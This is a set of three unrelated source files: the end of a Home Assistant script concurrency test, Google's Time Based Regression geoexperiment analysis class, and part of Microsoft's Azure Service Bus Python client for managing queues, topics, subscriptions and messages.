assert concurrently == script.is_on(hass, "script.script2")
if concurrently:
hass.states.async_set("input_boolean.test2", "on")
await asyncio.wait_for(service_called.wait(), 1)
service_called.clear()
assert "script2b" == service_values[-1]
await hass.async_block_till_done()
assert not script.is_on(hass, "script.script1")
assert not script.is_on(hass, "script.script2")
|
|
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Time Based Regression geoexperiment methodology.
"""
import collections
import functools
from matched_markets.methodology import semantics
from matched_markets.methodology import utils
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy as sp
import statsmodels.api as sm
class TBR(object):
"""Time Based Regression geoexperiment methodology.
This class models the relationship between control and treatment time series.
For details see [Kerman 2017](https://ai.google/research/pubs/pub45950).
"""
def __init__(self, use_cooldown=True):
"""Initializes a TBR analysis.
Args:
use_cooldown: bool. Whether cooldown period should be utilised.
"""
self.df_names = None
self.groups = None
self.periods = None
self.analysis_data = None
self.target = None
# Set up container for the response model, and potentially a cost model.
self.pre_period_model = None
self.use_cooldown = use_cooldown
def fit(self, data_frame, target, **kwargs):
"""Fit the TBR model to the supplied data frame.
See optional kwargs for interpretation of the data frame.
Args:
data_frame: a pandas.DataFrame. Should contain the columns and indices
corresponding to the **kwargs information below. Only one of response
or cost need be present, corresponding to the supplied `target`. Must be
indexed by date.
target: `str`. The name of the column to be analysed.
**kwargs: optional column/index names for the data and related semantics:
key_geo='geo' - geo data frame index name.
key_period='period' - experimental period column name.
key_group='group' - group assignment column name.
key_cost='cost' - cost column name.
key_response='response' - response column name.
key_date='date' - date index name.
key_incr_cost='_incr_cost' - incremental cost column name.
key_incr_response='_incr_response' - incremental response column name.
group_control=1 - value representing the control group in the data.
group_treatment=2 - value representing the treatment group in the data.
period_pre=0 - value representing the pre-test period in the data.
period_test=1 - value representing the test period in the data.
period_cool=2 - value representing the cooldown period in the data.
"""
# Set the target of the analysis.
self.target = target
# Extract any column / index name information supplied by the user.
user_df_names = utils.kwarg_subdict('key_', **kwargs)
self.df_names = semantics.DataFrameNameMapping(**user_df_names)
# Extract any semantics for control / treatment supplied by user.
user_group_semantics = utils.kwarg_subdict('group_', **kwargs)
self.groups = semantics.GroupSemantics(**user_group_semantics)
# Extract any semantics for experimental period supplied by user.
user_period_semantics = utils.kwarg_subdict('period_', **kwargs)
self.periods = semantics.PeriodSemantics(**user_period_semantics)
# Set up the analysis data.
self._construct_analysis_data(data_frame)
# Fit pre-period models for response and for cost.
self._fit_pre_period_model()
def _construct_analysis_data(self, data):
"""Stores group-wise time series by aggregating over control/treat geos."""
preserve = [self.df_names.group, self.df_names.date]
agg_style = {
self.target: 'sum',
self.df_names.period: 'max' # preserve the period info of the ts.
}
self.analysis_data = data.groupby(preserve).agg(agg_style)
def _fit_pre_period_model(self):
"""Estimates the control-treatment relationship in the pre-period."""
# Get the pre- period data in the form needed for regression.
period_index = self.analysis_data[self.df_names.period] == self.periods.pre
treat_vec = self._response_vector(period_index)
cntrl_mat = self._design_matrix(period_index)
# Fit an OLS model to the pre- period data.
self.pre_period_model = sm.OLS(treat_vec.values, cntrl_mat.values).fit()
def predict(self, cntrl_mat):
"""Counterfactual prediction for treatment group series in the test period.
Args:
cntrl_mat: a T by 2 `np.matrix`, representing a constant concatenated
to the control group time series, with T the test period length.
Returns:
A vector representing the expected treatment group time series.
"""
return self.pre_period_model.predict(cntrl_mat)
def _make_period_index(self, periods):
"""Returns an index for analysis_data rows in the desired time periods.
Args:
periods: int or non-empty iterable of int. The labels of the periods to
consider.
Returns: a pandas.Series of bools indicating whether each time point lies in
the supplied periods.
Raises:
ValueError: if an empty periods argument is passed.
"""
# Ensure we can iterate through periods.
if not isinstance(periods, collections.Iterable):
period_itr = (periods,)
else:
if periods:
period_itr = periods
else:
raise ValueError('Periods must not be an empty iterable.')
# Construct a list of bool valued pandas.Series indicating for each period
# whether each time point is in that period.
subset = self.analysis_data[self.df_names.period]
indices = [subset == i for i in period_itr]
return functools.reduce(np.logical_or, indices)
def causal_effect(self, periods):
"""Returns the difference of the actual and counterfactual prediction.
Args:
periods: int or iterable of int. The labels of the periods to consider.
Returns:
A vector representing the estimated causal effect of the treatment on the
target variable.
"""
period_index = self._make_period_index(periods)
# Get the test- period data in the form needed for regression.
treat_vec = self._response_vector(period_index)
cntrl_mat = self._design_matrix(period_index)
# Calculate the causal effect of the campaign.
treat_counter = self.predict(cntrl_mat)
return treat_vec - treat_counter
def _response_vector(self, period_index):
"""Return the treatment group's time-series for the specified period."""
adata = self.analysis_data
return adata[period_index].loc[self.groups.treatment][self.target]
def _design_matrix(self, period_index):
"""Return the design matrix for `periods`."""
# Short variable names
adata = self.analysis_data
cntrl = self.groups.control
target = self.target
# Construct the design matrix.
cntrl_vec = adata[period_index].loc[cntrl][target]
cntrl_mat = cntrl_vec.to_frame()
cntrl_mat.insert(0, 'const', 1)
return cntrl_mat
def causal_cumulative_distribution(self,
time=None,
rescale=1.0,
periods=None):
"""Return the distribution of the cumulative causal effect.
Args:
time: `int`. If specified, returns only the cumulative distribution at
this time index.
rescale: `float`. Additional scaling factor for the t-distribution.
periods: optional tuple of `int` (default None). The periods over which to
infer causal effects. If not supplied, the periods considered will include
the test period and also the cooldown period if the model was constructed
with use_cooldown=True.
Returns:
A t-distribution of type `scipy.stats._distn_infrastructure.rv_frozen`.
"""
# Define periods to credit to test.
if self.use_cooldown and periods is None:
periods = (self.periods.test, self.periods.cooldown)
elif periods is None:
periods = (self.periods.test,)
# Predict the causal effects of the experiment on response.
causal_response = self.causal_effect(periods)
# Counter of length test period.
period_index = self._make_period_index(periods)
cntrl_mat = self._design_matrix(period_index)
len_test = cntrl_mat.shape[0]
one_to_t = np.arange(1, len_test + 1)
one_to_t.shape = (len_test, 1)
# Scale contribution from parameters
cntrl_cum_mat = np.array(np.array(cntrl_mat.cumsum()) / one_to_t)
# Obtain the parameter covariance matrix.
vsigma = np.array(self.pre_period_model.cov_params())
# Each point in test-period has a different contribution.
var_params = []
for t in np.arange(len_test):
# Sum of parameter variance terms from eqn 5 of Kerman 2017.
var_t = (cntrl_cum_mat[t,] @ vsigma @ cntrl_cum_mat[t,].T)
var_params.append(var_t)
var_params = np.array(var_params).reshape(len_test, 1)
# Scale the results by T\sigma^2
var_from_params = var_params * one_to_t**2
# Scale contribution from test observations.
sigmasq = self.pre_period_model.scale
var_from_observations = one_to_t * sigmasq
# Set up the t-distribution.
delta_mean = rescale * np.array(np.cumsum(causal_response)).flatten()
delta_var = var_from_params + var_from_observations
delta_scale = rescale * sp.sqrt(delta_var).flatten()
delta_df = self.pre_period_model.df_resid
# Return a frozen t-distribution with the correct parameters.
if time is None:
return sp.stats.t(delta_df, loc=delta_mean, scale=delta_scale)
else:
return sp.stats.t(delta_df, loc=delta_mean[time], scale=delta_scale[time])
def summary(self, level=0.9,
threshold=0.0,
tails=1,
report='last',
rescale=1.0):
"""Summarise the posterior of the cumulative causal effect, Delta.
Args:
level: `float` in (0,1). Determines width of CIs.
threshold: `float`. Tests whether Delta is greater than threshold.
tails: `int` in {1,2}. Specifies number of tails to use in tests.
report: `str`, whether to report on 'all' or 'last' day in test period.
rescale: `float`, an additional scaling factor for Delta.
Returns:
pd.DataFrame, a summary at level, with alpha=1-level, containing:
- estimate, the median of Delta.
- precision, distance between the (1-level)/tails and 0.5 quantiles.
- lower, the value of the (1-level)/tails quantile.
- upper, if tails=2, the level/tails quantile, otherwise inf.
- scale, the scale parameter of Delta.
- level, records the level parameter used to generate the report.
- threshold, records the threshold parameter.
- probability, the probability that Delta > threshold.
Raises:
ValueError: if tails is neither 1 nor 2.
ValueError: if level is outside of the interval [0,1].
"""
# Enforce constraints on the arguments.
if tails not in (1, 2):
raise ValueError('tails should be either 1 or 2.')
if level < 0.0 or level > 1.0:
raise ValueError('level should be between 0.0 and 1.0.')
# Calculate the relevant points to evaluate.
alpha = (1-level) / tails
if tails == 1:
pupper = 1.0
elif tails == 2:
pupper = 1.0 - alpha
# Obtain the appropriate posterior distribution.
delta = self.causal_cumulative_distribution(rescale=rescale)
# Define periods to credit to test.
if self.use_cooldown:
periods = [self.periods.test, self.periods.cooldown]
else:
periods = [self.periods.test]
# Facts about the date index.
dates = self.causal_effect(periods).index
ndates = len(dates)
dates_ones = np.ones(ndates)
# Data for the report.
values = {
'dates': dates,
'estimate': delta.mean(),
'precision': np.abs(delta.ppf(alpha) - delta.ppf(0.5)).reshape(ndates),
'lower': delta.ppf(alpha).reshape(ndates),
'upper': delta.ppf(pupper).reshape(ndates),
'scale': delta.kwds['scale'].reshape(ndates),
'level': level * dates_ones,
'posterior_threshold': threshold * dates_ones,
'probability': 1.0 - delta.cdf(threshold).reshape(ndates)
}
# Ordering for the report.
ordering = ['estimate',
'precision',
'lower',
'upper',
'scale',
'level',
'probability',
'posterior_threshold'
]
# Construct the report, put it in the desired ordering.
result = pd.DataFrame(values, index=dates)
result = result[ordering]
# Decide how much of the report to report.
if report == 'all':
lines = result.shape[0]
elif report == 'last':
lines = 1
# Return the report for `lines` last days of the test period.
return result.tail(lines)
def plot(self, target, experiment_dates=None, margin=0.05):
"""Plot the control and treatment time series for the target variable.
Args:
target: str. The name of the target variable.
experiment_dates: iterable of str. Dates to mark with a vertical line.
margin: float. Determines the space at the top and bottom of the y-axis.
"""
# Labels of the group timeseries to be plotted.
groups = [self.groups.treatment, self.groups.control]
# Set the plotting limits.
column = self.analysis_data[target]
colmax = column.max()
colmin = column.min()
gap = margin*max(np.abs(colmax), margin*np.abs(colmin))
ymax = colmax + gap
ymin = colmin - gap
# Plot the timeseries.
for i in groups:
plt.plot(self.analysis_data.loc[i][target], label='Group %s' % i)
plt.legend()
plt.ylim((ymin, ymax))
# Place vertical lines on important dates.
if experiment_dates:
date_marks = pd.to_datetime(experiment_dates)
for dt in date_marks:
plt.vlines(dt, ymin, ymax, linestyles='dashed')
|
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
import datetime
import os
import time
from azure import (
_ETreeXmlToObject,
WindowsAzureError,
DEFAULT_HTTP_TIMEOUT,
SERVICE_BUS_HOST_BASE,
_dont_fail_not_exist,
_dont_fail_on_exist,
_encode_base64,
_get_request_body,
_get_request_body_bytes_only,
_int_or_none,
_sign_string,
_str,
_unicode_type,
_update_request_uri_query,
url_quote,
url_unquote,
_validate_not_none,
)
from azure.http import (
HTTPError,
HTTPRequest,
)
from azure.http.httpclient import _HTTPClient
from azure.servicebus import (
AZURE_SERVICEBUS_NAMESPACE,
AZURE_SERVICEBUS_ACCESS_KEY,
AZURE_SERVICEBUS_ISSUER,
_convert_event_hub_to_xml,
_convert_topic_to_xml,
_convert_response_to_topic,
_convert_queue_to_xml,
_convert_response_to_queue,
_convert_subscription_to_xml,
_convert_response_to_subscription,
_convert_rule_to_xml,
_convert_response_to_rule,
_convert_response_to_event_hub,
_convert_etree_element_to_queue,
_convert_etree_element_to_topic,
_convert_etree_element_to_subscription,
_convert_etree_element_to_rule,
_create_message,
_service_bus_error_handler,
)
class ServiceBusService(object):
def __init__(self, service_namespace=None, account_key=None, issuer=None,
x_ms_version='2011-06-01', host_base=SERVICE_BUS_HOST_BASE,
shared_access_key_name=None, shared_access_key_value=None,
authentication=None, timeout=DEFAULT_HTTP_TIMEOUT):
'''
Initializes the service bus service for a namespace with the specified
authentication settings (SAS or ACS).
service_namespace:
Service bus namespace, required for all operations. If None,
the value is set to the AZURE_SERVICEBUS_NAMESPACE env variable.
account_key:
ACS authentication account key. If None, the value is set to the
AZURE_SERVICEBUS_ACCESS_KEY env variable.
Note that if both SAS and ACS settings are specified, SAS is used.
issuer:
ACS authentication issuer. If None, the value is set to the
AZURE_SERVICEBUS_ISSUER env variable.
Note that if both SAS and ACS settings are specified, SAS is used.
x_ms_version:
Unused. Kept for backwards compatibility.
host_base:
Optional. Live host base url. Defaults to Azure url. Override this
for on-premise.
shared_access_key_name:
SAS authentication key name.
Note that if both SAS and ACS settings are specified, SAS is used.
shared_access_key_value:
SAS authentication key value.
Note that if both SAS and ACS settings are specified, SAS is used.
authentication:
Instance of authentication class. If this is specified, then
ACS and SAS parameters are ignored.
timeout:
Optional. Timeout for the http request, in seconds.
'''
self.requestid = None
self.service_namespace = service_namespace
self.host_base = host_base
if not self.service_namespace:
self.service_namespace = os.environ.get(AZURE_SERVICEBUS_NAMESPACE)
if not self.service_namespace:
raise WindowsAzureError('You need to provide servicebus namespace')
if authentication:
self.authentication = authentication
else:
if not account_key:
account_key = os.environ.get(AZURE_SERVICEBUS_ACCESS_KEY)
if not issuer:
issuer = os.environ.get(AZURE_SERVICEBUS_ISSUER)
if shared_access_key_name and shared_access_key_value:
self.authentication = ServiceBusSASAuthentication(
shared_access_key_name,
shared_access_key_value)
elif account_key and issuer:
self.authentication = ServiceBusWrapTokenAuthentication(
account_key,
issuer)
else:
raise WindowsAzureError(
'You need to provide servicebus access key and Issuer OR shared access key and value')
self._httpclient = _HTTPClient(service_instance=self, timeout=timeout)
self._filter = self._httpclient.perform_request
# Backwards compatibility:
# account_key and issuer used to be stored on the service class, they are
# now stored on the authentication class.
@property
def account_key(self):
return self.authentication.account_key
@account_key.setter
def account_key(self, value):
self.authentication.account_key = value
@property
def issuer(self):
return self.authentication.issuer
@issuer.setter
def issuer(self, value):
self.authentication.issuer = value
def with_filter(self, filter):
'''
Returns a new service which will process requests with the specified
filter. Filtering operations can include logging, automatic retrying,
etc... The filter is a lambda which receives the HTTPRequest and
another lambda. The filter can perform any pre-processing on the
request, pass it off to the next lambda, and then perform any
post-processing on the response.
'''
res = ServiceBusService(
service_namespace=self.service_namespace,
authentication=self.authentication)
old_filter = self._filter
def new_filter(request):
return filter(request, old_filter)
res._filter = new_filter
return res
def set_proxy(self, host, port, user=None, password=None):
'''
Sets the proxy server host and port for the HTTP CONNECT Tunnelling.
host:
Address of the proxy. Ex: '192.168.0.100'
port:
Port of the proxy. Ex: 6000
user:
User for proxy authorization.
password:
Password for proxy authorization.
'''
self._httpclient.set_proxy(host, port, user, password)
@property
def timeout(self):
return self._httpclient.timeout
@timeout.setter
def timeout(self, value):
self._httpclient.timeout = value
def create_queue(self, queue_name, queue=None, fail_on_exist=False):
'''
Creates a new queue. Once created, this queue's resource manifest is
immutable.
queue_name:
Name of the queue to create.
queue:
Queue object to create.
fail_on_exist:
Specify whether to throw an exception when the queue exists.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.body = _get_request_body(_convert_queue_to_xml(queue))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_queue(self, queue_name, fail_not_exist=False):
'''
Deletes an existing queue. This operation will also remove all
associated state including messages in the queue.
queue_name:
Name of the queue to delete.
fail_not_exist:
Specify whether to throw an exception if the queue doesn't exist.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_queue(self, queue_name):
'''
Retrieves an existing queue.
queue_name:
Name of the queue.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_queue(response)
def list_queues(self):
'''
Enumerates the queues in the service namespace.
'''
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/$Resources/Queues'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_queue)
def create_topic(self, topic_name, topic=None, fail_on_exist=False):
'''
Creates a new topic. Once created, this topic resource manifest is
immutable.
topic_name:
Name of the topic to create.
topic:
Topic object to create.
fail_on_exist:
Specify whether to throw an exception when the topic exists.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.body = _get_request_body(_convert_topic_to_xml(topic))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_topic(self, topic_name, fail_not_exist=False):
'''
Deletes an existing topic. This operation will also remove all
associated state including associated subscriptions.
topic_name:
Name of the topic to delete.
fail_not_exist:
Specify whether throw exception when topic doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_topic(self, topic_name):
'''
Retrieves the description for the specified topic.
topic_name:
Name of the topic.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_topic(response)
def list_topics(self):
'''
Retrieves the topics in the service namespace.
'''
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/$Resources/Topics'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_topic)
def create_rule(self, topic_name, subscription_name, rule_name, rule=None,
fail_on_exist=False):
'''
Creates a new rule. Once created, this rule's resource manifest is
immutable.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule.
fail_on_exist:
Specify whether to throw an exception when the rule exists.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.body = _get_request_body(_convert_rule_to_xml(rule))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_rule(self, topic_name, subscription_name, rule_name,
fail_not_exist=False):
'''
Deletes an existing rule.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule to delete. DEFAULT_RULE_NAME=$Default.
Use DEFAULT_RULE_NAME to delete default rule for the subscription.
fail_not_exist:
Specify whether throw exception when rule doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_rule(self, topic_name, subscription_name, rule_name):
'''
Retrieves the description for the specified rule.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_rule(response)
def list_rules(self, topic_name, subscription_name):
'''
Retrieves the rules that exist under the specified subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + '/rules/'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_rule)
def create_subscription(self, topic_name, subscription_name,
subscription=None, fail_on_exist=False):
'''
Creates a new subscription. Once created, this subscription resource
manifest is immutable.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
fail_on_exist:
Specify whether throw exception when subscription exists.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.body = _get_request_body(
_convert_subscription_to_xml(subscription))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_subscription(self, topic_name, subscription_name,
fail_not_exist=False):
'''
Deletes an existing subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription to delete.
fail_not_exist:
Specify whether to throw an exception when the subscription
doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_subscription(self, topic_name, subscription_name):
'''
Gets an existing subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_subscription(response)
def list_subscriptions(self, topic_name):
'''
Retrieves the subscriptions in the specified topic.
topic_name:
Name of the topic.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_subscription)
def send_topic_message(self, topic_name, message=None):
'''
Enqueues a message into the specified topic. The limit to the number
of messages which may be present in the topic is governed by the
message size in MaxTopicSizeInBytes. If this message causes the topic
to exceed its quota, a quota exceeded error is returned and the
message will be rejected.
topic_name:
Name of the topic.
message:
Message object containing message body and properties.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('message', message)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/messages'
request.headers = message.add_headers(request)
request.body = _get_request_body_bytes_only(
'message.body', message.body)
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def peek_lock_subscription_message(self, topic_name, subscription_name,
timeout='60'):
'''
This operation is used to atomically retrieve and lock a message for
processing. The message is guaranteed not to be delivered to other
receivers during the lock duration period specified in buffer
description. Once the lock expires, the message will be available to
other receivers (on the same subscription only) during the lock
duration period specified in the topic description. Once the lock
expires, the message will be available to other receivers. In order to
complete processing of the message, the receiver should issue a delete
command with the lock ID received from this operation. To abandon
processing of the message and unlock it for other receivers, an Unlock
Message command should be issued, or the lock duration period can
expire.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def unlock_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Unlock a message for processing by other receivers on a given
subscription. This operation deletes the lock object, causing the
message to be unlocked. A message must have first been locked by a
receiver before this operation is called.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def read_delete_subscription_message(self, topic_name, subscription_name,
timeout='60'):
'''
Read and delete a message from a subscription as an atomic operation.
This operation should be used when a best-effort guarantee is
sufficient for an application; that is, using this operation it is
possible for messages to be lost if processing fails.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + _str(subscription_name) + \
'/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def delete_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Completes processing on a locked message and delete it from the
subscription. This operation should only be called after processing a
previously locked message is successful to maintain At-Least-Once
delivery assurances.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be deleted as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + _str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def send_queue_message(self, queue_name, message=None):
'''
Sends a message into the specified queue. The limit to the number of
messages which may be present in the topic is governed by the message
size the MaxTopicSizeInMegaBytes. If this message will cause the queue
to exceed its quota, a quota exceeded error is returned and the
message will be rejected.
queue_name:
Name of the queue.
message:
Message object containing message body and properties.
'''
_validate_not_none('queue_name', queue_name)
_validate_not_none('message', message)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + '/messages'
request.headers = message.add_headers(request)
request.body = _get_request_body_bytes_only('message.body',
message.body)
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def peek_lock_queue_message(self, queue_name, timeout='60'):
'''
Automically retrieves and locks a message from a queue for processing.
The message is guaranteed not to be delivered to other receivers (on
the same subscription only) during the lock duration period specified
in the queue description. Once the lock expires, the message will be
available to other receivers. In order to complete processing of the
message, the receiver should issue a delete command with the lock ID
received from this operation. To abandon processing of the message and
unlock it for other receivers, an Unlock Message command should be
issued, or the lock duration period can expire.
queue_name:
Name of the queue.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
